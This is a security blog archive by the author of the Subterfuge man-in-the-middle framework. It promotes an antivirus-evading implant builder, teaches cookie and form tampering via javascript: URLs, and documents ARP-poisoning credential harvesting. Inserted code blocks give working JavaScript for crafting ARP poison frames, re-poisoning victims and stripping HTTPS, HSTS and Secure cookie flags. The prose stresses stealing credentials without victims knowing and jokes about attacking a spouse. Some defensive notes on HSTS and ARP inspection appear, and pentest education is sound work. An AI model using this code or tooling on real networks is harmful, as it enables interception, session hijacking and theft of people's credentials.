Category Archives: Computer Security

Accelerate your Attack with Artemis

It is widely acknowledged that antivirus is not an effective control against 0-day threats. Not until malware has been propagating in the wild for a while does it catch a vendor's eye and get a signature. Once that happens it is trivial for a malicious actor to modify the source while preserving the tool's functionality, and the process starts all over again. For the penetration tester this means that each of us needs an individual answer to the antivirus problem in order to give clients the value they deserve from an information security assessment. After all, if the bad guys are doing it, it must be part of our evaluation procedures too. Penetration testers should not have to spend their time bypassing a security mechanism that less ethical hackers would simply vaporize. We built Artemis to address this deficiency.

Artemis is an advanced malware simulation suite built to emulate the Advanced Persistent Threat. It gives ethical hackers and penetration testers a feature set equivalent to many of the tools employed by criminal gangs today. By moving polymorphism to a server-based platform at cevincere.com, Artemis aims to stay one step ahead of antivirus vendors and ensure that penetration testers can give their clients the value they deserve.

How Artemis Bypasses Antivirus

Cevincere uses several techniques to generate a unique binary each time Artemis is built. Because the resulting file differs substantially from every previous build, a static signature written against one copy does not match the next. Note what this does and does not cover: it defeats signature-based detection, not heuristic or behavioural detection of what the implant does once it runs, and because the binaries are generated by an external service, think twice before embedding client-specific details in a payload you send through it.

Features

  • Evades signature-based anti-virus detection
  • Integrates with free tools like the Metasploit Framework & Armitage
  • Robust communication channel maximizes connectivity
  • Increases stealth by dialing back on a customizable interval

I hope that Artemis is able to help you push your penetration tests to the next level! The video below is a short demonstration of how Artemis may be able to assist you. Happy Hacking!

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

The competitive atmosphere was palpable and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by, we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure: if there were a word for what I took away from NetWars, that would be it. While trawling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory.

Finally, the scoreboard at the end of the competition.

Pentesting WebApps with Javascript URL Injection

Synopsis

Ever have to run a pentest sans tools? Breaking a web app can be a fairly tedious experience when your intercepting proxy has flown the coop. Believe it or not, many of the things you are used to doing through ZAP or Burp Suite can also be done from the URL bar of your browser. URL injection is a quick way to do anything from reading and modifying your browser's cookies, to changing form data, to rewriting arbitrary markup on the page.

Injection Basics

For starters, let's take a look at how it's done:

Basic URL Injection

javascript:alert(document.cookie)

The JavaScript alert function is the progenitor of those annoying popups that pervaded the Internet in the nineties, and it still lives on at the sites of developers who haven't pulled their heads out of a hole in over a decade. For our purposes it is extremely handy: we can use it to quickly interrogate the browser. The command above displays the current cookie values for the page's origin. The browser can be interrogated the same way for just about any of the information an intercepting proxy yields, with one caveat: cookies flagged HttpOnly never appear in document.cookie, so an empty alert does not prove there is no session cookie.

Many web applications carry authentication and session state in cookies. With the injection above, revealing them is trivial, and it is normally one of the first things I do to any web app I'm pentesting. Getting information is all well and good, but how can we put this technique to more nefarious purposes?

Cookie Fraud

JavaScript URL injection is my preferred method of modifying web session cookies because it's quick, easy, and because 60% of the time it works every time. This is most elegantly done by wrapping the assignment in void(), though that can be left off.

More elegant:
javascript:void(document.cookie="MyCookie=MyValue")

Less elegant:
javascript:document.cookie="UserID=42"

The less elegant form navigates your browser to a page consisting of the cookie string, because a javascript: URL that evaluates to a string replaces the current document with that string; void() discards the value so you stay on the page. With the second form you have to browse back to the original site for your edit to take effect. It is, however, easier to remember. Two further caveats: the new cookie only replaces the old one if its path and domain match, otherwise the browser stores a second cookie alongside the original and the server keeps seeing the old one; and current browsers strip the javascript: prefix from text pasted into the URL bar, so either type it by hand or save the snippet as a bookmarklet.

Modifying Form Data

One of the most useful features of an intercepting proxy is the ability to modify form data on the fly. In a pentest we use this to fuzz a site's inputs, hunting for anything from XSS to SQL injection. It can also be done with URL injection. Check it out:

javascript:void(document.forms[0].to.value="");

Here forms[0] is the first form on the page and to is the name of the field being cleared; substitute the field you want to change, and remember that hidden fields are addressed exactly the same way.

Editing Arbitrary Web Data

And finally, for those moments when you have to edit some random HTML element on a page, there is the innerHTML property. Check out Google's new facelift!

javascript:void(document.getElementById('lga').innerHTML="<img src='http://kinozoa.com/images/0sm0s1z.png' style='padding-top:112px'>")

Basically, we pick an element on the page by its id (in this case lga, the container of Google's logo at the time) and use innerHTML to rewrite its markup in real time. Note that this is an edit of your own rendering of the page, not a change on the server; it becomes an attack only when you can make it happen in someone else's browser, which is exactly what a man-in-the-middle position buys you.

This is also pretty nifty when you've MITM'd your spouse with Subterfuge and want to make some seamless edits… because, you know… hacker…
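The sections above (cookie inspection, cookie overwriting, form tampering) boil down to a few DOM operations that an intercepting proxy would otherwise do for you. The following is an added example, not code from the original post: a small "proxy in the URL bar" toolkit. The pure functions take a cookie string and an array of form-like objects so they can be exercised outside a browser; urlBarSnapshot() applies them to the live page and is what you would paste as a javascript: URL or save as a bookmarklet. The cookie and form data in the comments are constructed for illustration.

```javascript
// Added example, not code from the original post. A "proxy in the URL bar":
// parse the cookie jar, build a correct cookie overwrite, and list or tamper
// with form fields the way an intercepting proxy would.

// Parse the document.cookie string ("a=1; b=2") into an object. Values are
// percent-decoded; a value that itself contains '=' is kept whole.
function parseCookies(cookieString) {
  const jar = {};
  for (const piece of cookieString.split(';')) {
    const entry = piece.trim();
    if (!entry) continue;
    const eq = entry.indexOf('=');
    const name = eq === -1 ? entry : entry.slice(0, eq);
    const raw = eq === -1 ? '' : entry.slice(eq + 1);
    let value;
    try { value = decodeURIComponent(raw); } catch (e) { value = raw; }
    jar[name] = value;
  }
  return jar;
}

// The string to assign to document.cookie when overwriting a cookie. Path
// and domain must match the cookie being replaced; otherwise the browser
// stores a second cookie and the server keeps receiving the old one.
function cookieAssignment(name, value, opts = {}) {
  let s = `${name}=${encodeURIComponent(value)}; path=${opts.path || '/'}`;
  if (opts.domain) s += `; domain=${opts.domain}`;
  return s;
}

// The javascript: URL that performs the overwrite without navigating away.
// void() matters: the assignment expression evaluates to the cookie string,
// and a javascript: URL that returns a string replaces the page with it.
function cookieSetterUrl(name, value, opts) {
  return `javascript:void(document.cookie=${JSON.stringify(cookieAssignment(name, value, opts))})`;
}

// Summarise forms the way a proxy shows them. Hidden inputs are flagged
// because they are where prices, IDs and roles the server wrongly trusts
// usually live. `forms` may be document.forms or plain objects.
function describeForms(forms) {
  return Array.from(forms).map((form, index) => ({
    index,
    action: form.action || '',
    method: (form.method || 'get').toUpperCase(),
    fields: Array.from(form.elements)
      .filter((el) => el.name)
      .map((el) => ({ name: el.name, type: el.type || 'text', value: el.value, hidden: el.type === 'hidden' })),
  }));
}

// Overwrite fields by name before submission. Returns the names actually
// changed so a typo in a field name is noticed instead of silently ignored.
function tamperForm(form, changes) {
  const changed = [];
  for (const el of Array.from(form.elements)) {
    if (Object.prototype.hasOwnProperty.call(changes, el.name)) {
      el.value = changes[el.name];
      changed.push(el.name);
    }
  }
  return changed;
}

// Browser entry point: javascript:alert(JSON.stringify(urlBarSnapshot())).
// Cookies marked HttpOnly never appear in document.cookie, so an empty
// cookie list does not mean the application has no session cookie.
function urlBarSnapshot() {
  if (typeof document === 'undefined') return null;
  return { cookies: parseCookies(document.cookie), forms: describeForms(document.forms) };
}
```

In a browser, paste the function definitions into the console once and then use the javascript: URLs it generates; the cookieSetterUrl output is exactly the "more elegant" form above, with the path set explicitly so the overwrite lands on the cookie the server actually reads.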

 

Combine Subterfuge with Armitage Adversaries Beware!



Subterfuge and Armitage make a Terrific Duo!

Okay… so you can harvest creds like a boss. What else can you do with Subterfuge? In this video we combine Subterfuge with Raphael Mudge’s Armitage to unleash the full power of Metasploit on our foes!

This video is a good example of how we like to use Subterfuge, but whether it’s Armitage, msfconsole, or a homegrown exploit, Subterfuge can send victims your way. In today’s more security-conscious age you are far more likely to turn a client-side exploit into a successful pentest than the remote code execution vulnerabilities that pervaded the past decade.

On Armitage

Armitage gets a lot of flak from some MSF power users, but personally I find its integration with Metasploit’s RPC to be the most convenient way to interact with msfconsole. Mudge has put a ton of work into Armitage over the past couple of years. The result is a sleek, capable tool that just gets the job done. Thanks Rafi!

 


 

Check out his site: Strategic Cyber

Attack Breakdown

Difficulty – Intermediate

Attack Methods – ARP Cache Poisoning, HTTPS Downgrade, Java Signed Applet (Browser Exploit)

Subterfuge Documentation



Enter Subterfuge, a framework that takes the arcane art of man-in-the-middle attacks and makes it as simple as point and shoot. Subterfuge demonstrates the weaknesses of the ARP protocol by harvesting credentials that cross the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

How to use this Document

Reading through this entire document may be tedious, and it will certainly deluge you with information you have no desire to know. To aid your perusal, below is a short summary of each section so that you know where to go for the information you came for:

Introduction

This section is for those of you who are interested in where the Subterfuge Project came from, why it exists, and what we hope to accomplish. The introduction focuses on the risks of MITM attacks, the programmatic structure of Subterfuge, and the community buoying it up.

The Attack

The next portion of the documentation gets right into running Subterfuge. It starts with the most basic usage, and moves on to basic module usage as well as settings and configuration options.

Modules

Extending the attack through plugins and modules. This section takes an in-depth look at how Subterfuge can really work for you.

Troubleshooting

The most pervasive problem with hacking tools is that they never quite work right for everyone. Between the plethora of different builds we operate and the differing conditions of each attack, breaking things is almost inevitable. Here’s what to do to fix it.

Third-Party Tool Integration

Subterfuge doesn’t exist in a vacuum, and we didn’t design it that way. Here we discuss the external tools that the project leverages, and how they interact with the framework to make the penetration testing experience more fluid and dynamic.

Extending Subterfuge

Making Subterfuge work for you is easy. This portion of the documentation talks about just how to get deeper functionality out of the system.

Contributing to the Project

Community support for the project has been great so far. If you would like to contribute in some manner then this section might merit your perusal.

Appendices

Other stuff. See for yourself.

Installing Subterfuge on Kali Linux



Walkthrough

This is an install of Subterfuge version 1.0 on a VirtualBox VM running Kali Linux 1.0.2. Packages were updated first by running:

apt-get update
apt-get dist-upgrade

Step 1: Download the Code

Downloads

Step 2: Install Subterfuge

dpkg -i subterfuge_1.0-1_all.deb

Step 3: If the installer errors out on missing dependencies, install them and let dpkg finish configuring Subterfuge

apt-get update && apt-get -f install

Because Subterfuge has deprecated its old installer in favour of Debian packaging, installing it should no longer be able to break your existing packages: dpkg records every file it installs and apt resolves the dependencies. As with any package installed as root, verify the integrity of the download before running dpkg -i on it.

Hopefully this install worked out for you all. Post in the comments if your issues still seem to persist, and we’ll try to help you work it out.

On Blogging

Thus far I’ve only ever blogged about Subterfuge extensively. While I have been focusing on Subterfuge development over the past year, it hasn’t been my only pursuit. I figured I’d open things up a bit and start adding additional content to the site. Things to expect to see here:

  • Subterfuge Stuff (of course)
  • General Security Topics
  • Red Team Tactics
  • Other Projects I’m Working On
  • Encounters of a Third Kind (interesting security related things I run into on the net)

To start things off I figured I’d post my writeup for the 2012 SANS Holiday Hack. The writeup is a bit belated, but it was a fun little competition. Link

Subterfuge — The Attack

Note that on BackTrack, scripts (JavaScript) MUST be enabled in the browser in order for Subterfuge’s interface to run.

“He who is prudent and lies in wait for an enemy, who is not, will be victorious.” –-Sun Tzu

Right, so on to the part everyone actually cares about: running Subterfuge! This part of the documentation focuses on getting the framework up, running, and working for you. Let’s get started.

Installation Procedures

Gaining a MITM Position

Now that we’ve got the framework installed, let’s attack. The first step in any Subterfuge attack is gaining a man-in-the-middle position. Currently, Subterfuge ships with only one method of establishing itself as MITM, ARP cache poisoning. Nevertheless, as a framework, its modular design allows it to support multiple methods.

Running Subterfuge:
To start Subterfuge, click the Start button in the top right corner. A popup window asks whether you would like Subterfuge to configure the attack automatically; select OK. The attack should now be running, as seen above.

ARP Cache Poisoning

What did we just do? If you already know, or don’t really care, move on to the next section. For those who do care, let’s take a moment to talk about the anatomy of the attack. I won’t get into the behind-the-scenes actions Subterfuge takes to make the process this easy; if you are interested in that, head over to Extending Subterfuge and the Appendices.

Let’s back up a moment and talk about the Address Resolution Protocol (ARP). ARP is about as simple as a protocol gets. Its purpose is to map IP addresses to MAC (hardware) addresses so that devices on the local area network (LAN) can find each other. Excluding Reverse ARP, there are really only two things an ARP message can say:

  1. ARP Request – “Who has IP address X?”
  2. ARP Reply – “IP X is at MAC address X”

What happens if, instead of the honest reply, we say “IP X is at MAC address Y”? Every host that receives the packet updates its ARP cache to match, because there isn’t a shred of authentication anywhere in the protocol. That is the fundamental problem. Below is a Wireshark capture of such a packet.

Because this packet was sent to the broadcast address, every machine on the LAN sees it and adjusts its ARP table to match. This means that all traffic bound for 192.168.1.1 (the router’s IP address) goes instead to the box bearing the attacker’s MAC address. We’ve achieved man-in-the-middle for the victims’ outbound traffic. Two things are needed to make it a full, usable MITM: the router has to be poisoned the same way with the victims’ IP addresses so that return traffic also passes through the attacker, and the attacker’s box must forward IP packets (net.ipv4.ip_forward=1 on Linux), otherwise the victims simply lose connectivity and notice.

A victim running Windows 7 displays its ARP table

Dynamic Poison Retention & ARPBlock

One problem with a traditional ARP cache poisoning attack is that the router and the victims occasionally send legitimate ARP requests and replies, so the attacker loses the MITM position for a period immediately after that traffic. To minimize this, a typical attack simply sprays spoofed replies across the network on a timer. Subterfuge uses arptables to block ARP that it did not send itself, and it uses what we’ve taken to calling Dynamic Poison Retention to re-poison in response to legitimate ARP rather than on a fixed ticker. This allows a much more stable attack, and it improves stealth because far fewer spoofed frames are sent.

Dynamic Poison Retention in action

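The ARP reply described in the two preceding sections, and the observation that legitimate ARP undoes it, are easiest to see in bytes. The following is an added example, not part of Subterfuge: it builds the unsolicited reply as a raw Ethernet frame, parses frames back, and implements the check a defender's ARP watcher uses, which is also the event that Dynamic Poison Retention reacts to: a reply that changes an IP-to-MAC binding that was already learned. Node's standard library has no raw-socket API, so transmitting the frame needs a pcap or raw-socket binding; crafting and detection run anywhere. The MAC and IP addresses used are constructed for the example.

```javascript
// Added example, not Subterfuge's code. Raw ARP crafting plus the binding-
// change check used both by ARP watchers and by re-poisoning logic.

const ETH_P_ARP = 0x0806;
const ARP_REQUEST = 1;
const ARP_REPLY = 2;
const BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff';

function macToBytes(mac) {
  return Buffer.from(mac.split(':').map((h) => parseInt(h, 16)));
}
function bytesToMac(buf) {
  return Array.from(buf, (b) => b.toString(16).padStart(2, '0')).join(':');
}
function ipToBytes(ip) {
  return Buffer.from(ip.split('.').map(Number));
}
function bytesToIp(buf) {
  return Array.from(buf).join('.');
}

// Ethernet II header (14 bytes) + ARP body (28 bytes) = 42 bytes on the wire.
function buildArp(op, senderMac, senderIp, targetMac, targetIp, dstMac = targetMac) {
  const eth = Buffer.alloc(14);
  macToBytes(dstMac).copy(eth, 0);
  macToBytes(senderMac).copy(eth, 6);
  eth.writeUInt16BE(ETH_P_ARP, 12);
  const arp = Buffer.alloc(28);
  arp.writeUInt16BE(1, 0);      // hardware type: Ethernet
  arp.writeUInt16BE(0x0800, 2); // protocol type: IPv4
  arp[4] = 6;                   // hardware address length
  arp[5] = 4;                   // protocol address length
  arp.writeUInt16BE(op, 6);
  macToBytes(senderMac).copy(arp, 8);
  ipToBytes(senderIp).copy(arp, 14);
  macToBytes(targetMac).copy(arp, 18);
  ipToBytes(targetIp).copy(arp, 24);
  return Buffer.concat([eth, arp]);
}

// The poison from the capture above: "routerIp is at attackerMac". Broadcast
// form teaches every host on the LAN; the directed form teaches one victim
// and is quieter. Note that some stacks only update an entry that already
// exists, so a victim that has never spoken to the router may ignore it.
function poisonFrame(routerIp, attackerMac, victim = null) {
  if (victim) return buildArp(ARP_REPLY, attackerMac, routerIp, victim.mac, victim.ip);
  return buildArp(ARP_REPLY, attackerMac, routerIp, BROADCAST_MAC, routerIp);
}

function parseArp(frame) {
  if (frame.length < 42 || frame.readUInt16BE(12) !== ETH_P_ARP) return null;
  const arp = frame.subarray(14);
  if (arp.readUInt16BE(0) !== 1 || arp.readUInt16BE(2) !== 0x0800 || arp[4] !== 6 || arp[5] !== 4) return null;
  return {
    op: arp.readUInt16BE(6),
    senderMac: bytesToMac(arp.subarray(8, 14)),
    senderIp: bytesToIp(arp.subarray(14, 18)),
    targetMac: bytesToMac(arp.subarray(18, 24)),
    targetIp: bytesToIp(arp.subarray(24, 28)),
  };
}

// Learn IP-to-MAC bindings from replies and report any change. A defender
// alerts on the change; an attacker doing dynamic poison retention treats
// the same event (the router's real MAC reappearing) as the cue to re-poison.
class ArpWatch {
  constructor() { this.table = new Map(); }
  observe(frame) {
    const pkt = parseArp(frame);
    if (!pkt || pkt.op !== ARP_REPLY) return null;
    const previous = this.table.get(pkt.senderIp);
    this.table.set(pkt.senderIp, pkt.senderMac);
    if (previous && previous !== pkt.senderMac) {
      return { ip: pkt.senderIp, from: previous, to: pkt.senderMac };
    }
    return null;
  }
}
```

Feed ArpWatch the frames from a capture of the LAN and every flip of the router's binding between its real MAC and the attacker's shows up as an event; a static ARP entry for the gateway, or Dynamic ARP Inspection on a managed switch, is what stops the flip from being accepted in the first place.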

Using Subterfuge Modules

So now you’ve got MITM, but what on God’s green earth do you do with it? Let’s take a quick look at Subterfuge’s modules.

The Subterfuge Module View


Subterfuge ships with many modules. After acquiring a man in the middle position we have a strongpoint from which to pillage the network. Subterfuge makes leveraging this position as simple as a few clicks. Check out the modules section for more on this.

Settings and Configuration Options

One of the most distinctive aspects of Subterfuge among network attack tools is the ease with which you can customize virtually anything about your attack. The settings page makes configuring and optimizing an attack simple.

Configuring Subterfuge is Simple


Attacking from the Network View

Through the Network View, Subterfuge opens up a whole new way to visualize and interact with a MITM position. Every box in this view represents an actively poisoned victim. Subterfuge synchronizes individual portions of the page with the server to make the attack look and feel real-time. The Network View also makes it easy to control the scope of your attack and to interact with modules directly, all from one place.

Subterfuge’s Network View Demonstrates an all New Way to interact with a MITM Position


That’s all there is to starting up a basic MITM attack with Subterfuge. The next chapter focuses on how to leverage your attack position with the framework’s modules.

Documentation Introduction

About Subterfuge

A rapidly expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework that provides instantaneous results. By contrast, much of the information security community still finds itself performing manual, complicated tasks to administer and protect its computer networks. Subterfuge is a simple but devastatingly effective Man-in-the-Middle (MITM) attack framework that exploits the inherently trusting Address Resolution Protocol. It does this in such a way that even a non-technical user has the ability, at the push of a button, to attack all machines connected to the local area network (LAN). Subterfuge further provides the framework by which users can then leverage a MITM position to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security validation tool.

User-friendly network attack tools are quick to make national headlines due to the threat they pose and because, “in truth, the tools and techniques employed by hackers are extremely complex[1].”  Firesheep, a Firefox web browser plugin, is just such a tool.  It was designed to capture cookies created during the login process for secure web sites, and it does this at the push of a button.  Firesheep’s push-button simplicity and overwhelming effectiveness led to its ubiquitous use by skilled professionals and non-skilled users alike, thus focusing attention on a fixable yet often-ignored error in web site implementation. What makes tools with this level of simplicity interesting is that, while any skilled hacker should be able to script something equivalent with little effort, he no longer has to, and can now focus on more delicate attacks.

The Subterfuge Project attempts to use the paradigm popularized by Firesheep, Armitage, and other user-friendly network attack tools to create a framework for Man-In-The-Middle (MITM) attacks.  A MITM attack uses eavesdropping to insert a malicious entity into the communication path between legitimate users on a network[2].  This entity can then masquerade as either of the legitimate users in order to capture sensitive information, like login credentials for a protected web site.  Typically, a MITM attack requires a significant amount of complex, text-based configuration of numerous software programs.  This complexity, combined with the virtually never-ending reports of stolen identities and online credential theft, makes the MITM attack a prime candidate for the creation of a user-friendly, simplified framework.

We designed the framework to have a simple interface with minimal configuration requirements in order to appeal to skilled and non-skilled network security professionals and users alike.  Subterfuge has a sleek web based interface to allow a user to deploy the software quickly and easily without editing sophisticated text-based configuration files.  Subterfuge automates the configuration process or, alternately, streamlines it with a Graphical User Interface (GUI). It also allows the user to view a report of all the different credentials that were harvested. The ease with which the general populace would be able to use Subterfuge will demonstrate to information security professionals the dangers of MITM attacks on a large scale.

Subterfuge is developed with the Python programming language and uses a SQLite database. JavaScript handles significant frontend logic.

Man-in-the-Middle Threat Analysis

So what is the big deal? Well a study from Cornell University’s Center for Hospitality Research stated that over 90% of hotels provide wireless Internet access to their customers, and the vast majority of these access points are susceptible to ARP Poisoning Attacks[3].

There are two significant types of MITM attacks: Passive and Active.  In a Passive attack, a hacker can observe what his victim is viewing, which allows the attacker to steal credentials and session cookies.  In an Active attack, “the target is entirely controlled by the attacker, rather than being limited by the extent of the victim’s browsing activity[4]”.

Several major websites, such as Google and Facebook, realized some time ago that they had made a significant blunder in terms of browsing security for their users. Facebook used to encrypt only the login traffic, which carried the username and password; afterwards the session fell back to plain-text browsing, which anyone performing a MITM attack could intercept and read. In a paper on the security issues challenging Facebook, the need to “educate Facebook users about using secure socket layer (SSL) applications” is discussed as a prerequisite to protecting their users from identity theft[5]. Both sites have since moved the whole session to HTTPS and deploy HTTP Strict Transport Security, which makes the HTTPS downgrade described later in this document ineffective against a browser that has already seen the policy.

In addition to web site design and implementation errors, the Address Resolution Protocol (ARP) itself has design weaknesses that are routinely exploited during a MITM attack. The extent to which computers on a local network rely on, and inherently trust, ARP messages is alarming. If ARP message processing remains uncontrolled, ARP sniffing and poisoning can occur, which means that an attacker can begin masquerading as a legitimate host[6]. The steps the security community has taken to secure ARP remain inadequate: protections such as static gateway entries and Dynamic ARP Inspection on managed switches exist, but they are rarely deployed and rarely available on consumer equipment. Heightened awareness of the threat posed by MITM attacks should become more commonplace amongst both computer users and security professionals.

Man-in-the-middle attacks are a category of vulnerability to which most applicable systems are susceptible. They remain so largely because of obscurity. Until MITM attacks are simple enough that even aspiring security professionals can easily leverage them against networks, manufacturers will continue to develop and distribute vulnerable equipment. With Subterfuge, it is possible to make knowledge of these vulnerabilities mainstream, beyond even the security community. Subterfuge can be the motivation that manufacturers like Cisco need to build the protections they have provided to their enterprise customers for years into the systems they sell the average consumer.

The overall goal was to develop a tool that is sufficiently effective and easy to use in order to encourage the security community to focus on the massive vulnerability inherent in the Address Resolution Protocol.  To achieve this result, we created a framework called Subterfuge, which allows even an average user to exploit the vulnerabilities in ARP on a local network.

The most basic implementation of Subterfuge collects information and user authentication credentials across an entire local area network and organizes the collected data into a SQLite Database.  It does this by automating an ARP Cache Poisoning Attack while leveraging SSLStrip, which is publicly available.

Subterfuge automatically manages its configuration, yet allows more advanced users the ability to delve deeper into the MITM settings.  This requires Subterfuge to detect the hardware and network configurations needed to initiate the attack.  Additionally, Subterfuge is able to properly configure, setup, and deploy SSLStrip with little or no input required from the user. The tedious and difficult problem of properly configuring and executing these multiple pieces of software in unison is eased by the automation developed and included in the Subterfuge Project.

This tool is deemed successful if a user is able to execute Subterfuge to collect user information and credentials on the network to which they are connected. Specifically, a Subterfuge user ought to be able to steal credentials, without the victim’s knowledge, even when the victim believes they are using a “secure” protocol such as HTTPS.
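The last three paragraphs describe leveraging SSLStrip to defeat the victim's perception of HTTPS. The following is an added example, not SSLStrip's or Subterfuge's own code: it shows the edits an HTTPS downgrade proxy has to make to a response on its way to the victim, and the browser-side state that puts a site out of reach. The sample headers and body are constructed for the example; the host names are placeholders.

```javascript
// Added example, not sslstrip's code. The core of an HTTPS downgrade: rewrite
// https:// references to http://, remember them, and scrub the two headers
// that would otherwise give the game away.

class Downgrader {
  constructor() {
    // http:// URLs handed to the victim, mapped back to their https:// originals
    this.stripped = new Map();
  }

  // Rewrite every https:// reference so the victim's next request is plain
  // text and therefore passes through the proxy in the clear.
  rewriteBody(html) {
    return html.replace(/https:\/\/[^\s"'<>]+/g, (secureUrl) => {
      const plainUrl = 'http:' + secureUrl.slice('https:'.length);
      this.stripped.set(plainUrl, secureUrl);
      return plainUrl;
    });
  }

  // Strict-Transport-Security would teach the browser to refuse plain text
  // on later visits, so it is dropped. A Set-Cookie carrying Secure would
  // never be returned over http and the session would appear to break, so
  // the attribute is removed and the cookie then flows in the clear.
  rewriteHeaders(headers) {
    const out = {};
    for (const [name, value] of Object.entries(headers)) {
      const key = name.toLowerCase();
      if (key === 'strict-transport-security') continue;
      out[name] = key === 'set-cookie' ? value.replace(/;\s*secure(?=;|$)/gi, '') : value;
    }
    return out;
  }

  // When the victim requests a URL that was downgraded, the proxy itself
  // talks HTTPS to the real server; everything else is passed through as is.
  upstreamFor(requestedUrl) {
    return this.stripped.get(requestedUrl) || requestedUrl;
  }
}

// The defence: a browser that already holds an HSTS entry for the host (from
// an earlier clean visit or the preload list) rewrites http:// to https://
// itself before sending anything, so no plain-text request reaches the proxy
// and there is nothing to strip.
function browserWillUpgrade(host, hstsCache) {
  return hstsCache.has(host);
}

// Constructed sample of what the origin server sent over HTTPS.
const SAMPLE_HEADERS = {
  'Content-Type': 'text/html',
  'Strict-Transport-Security': 'max-age=31536000',
  'Set-Cookie': 'sid=abc123; Path=/; Secure; HttpOnly',
};
const SAMPLE_BODY = '<a href="https://login.example.com/auth?next=1">Log in</a> ' +
  '<img src="http://cdn.example.com/logo.png">';
```

Run rewriteBody and rewriteHeaders over the sample and the login link, the HSTS header and the Secure flag all disappear, which is the whole attack; run browserWillUpgrade with the host already in the cache and the browser never produces the plain-text request the proxy depends on, which is why the downgrade no longer works against sites whose policy the victim's browser has already learned.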

About the Creators

Subterfuge was created by Christopher Shields (r00t0v3rr1d3) & Matthew Toussain (0sm0s1z).

Program Composition

In the field of Man-in-the-Middle tools Subterfuge has a unique structure, which opens the door to a wide array of additional features and options.

Server/Client Architecture

Subterfuge uses a server/client architecture. When you run Subterfuge you are actually starting a server that is then accessed by a client, a web browser. This matters because it is the basis for collaboration within the system: multiple devices can access a Subterfuge server simultaneously, and because status is monitored in real time, interaction between penetration-testing parties is possible.

Furthermore, this architecture gives us the ability to turn Subterfuge into a payload to MITM a remote network. (In development for a future release)

Web Frontend

The web frontend comprises the Graphical User Interface that you interact with. Because HTTP is a stateless protocol significant JavaScript logic was implemented in order to give the framework a live look and feel.

Database

Subterfuge uses a SQLite database. We chose SQLite 3 because it is exceedingly lightweight and easy to port. It meant that the framework could ship with a preconfigured database of its own rather than have to configure one as part of the installation process. The database includes sections for modules, settings, and third-party programs. (See Extending Subterfuge for more information.)

OS Compatibility

As of Version 4.1 Subterfuge is compatible with the Linux Operating System only. Future cross-platform compatibility is in the works. The next step will involve releasing an OSX version, followed by Windows XP & Windows 7. The OSX version should be BSD compatible.

Currently, significant issues exist when attempting to port Subterfuge into the Windows environment. As such this step in the port may not occur for some time.

The Framework

Naturally, Man-in-the-Middle Attacks are not limited to mere credential fraud. Neither is Subterfuge. Basic usage of the tool will be to ARP Poison the LAN; however, from this perspective it is possible to initiate many attacks. The Framework will automatically gather credentials, but it can also do more. Subterfuge’s Plugin System allows for the usage of additional MITM functionality without the need to develop another security tool from scratch.

Community Support

When development of the Subterfuge Project began we created a Google Code site in order to help us with project management and collaboration. What we did not expect was for the community to stumble upon it, and begin hyping it. What we certainly did not anticipate was those of you out there who actually contributed code to the project to help us alleviate bugs.

Then someone must have told Backbox Linux about our tool, because they approached us to get Subterfuge added into their repositories. Finally, after our beta release at DEFCON BackTrack Linux adopted the tool, and it was included in version 5 release 3.

So far the community has been very accepting of our errors and pages upon pages of bug notes. We intend to keep extending the framework and building new features into it, so thank you in advance for bearing with us through several more reams of release notes jam-packed with bugs and fixes.

From the moment the community found it you all have been tweeting, writing articles, giving suggestions, and even contributing code to the project. Thanks for the support!

 


[1] Barber, R. Security Science. Computer Fraud & Security, Volume 2001, Issue 3. Retrieved 30 August 2011.

[2] Kurose, J. and Ross, K. Computer Networking: A Top-Down Approach, 5th Edition. Addison-Wesley. Page 61.

[3] Ogle, J. and Wagner, E. Hotel Network Security: A Study of Computer Networks in U.S. Hotels. Cornell Center for Hospitality Research. Retrieved 8 March 2012 from http://www.hotelschool.cornell.edu/research/chr/pubs/reports/abstract-14928.html

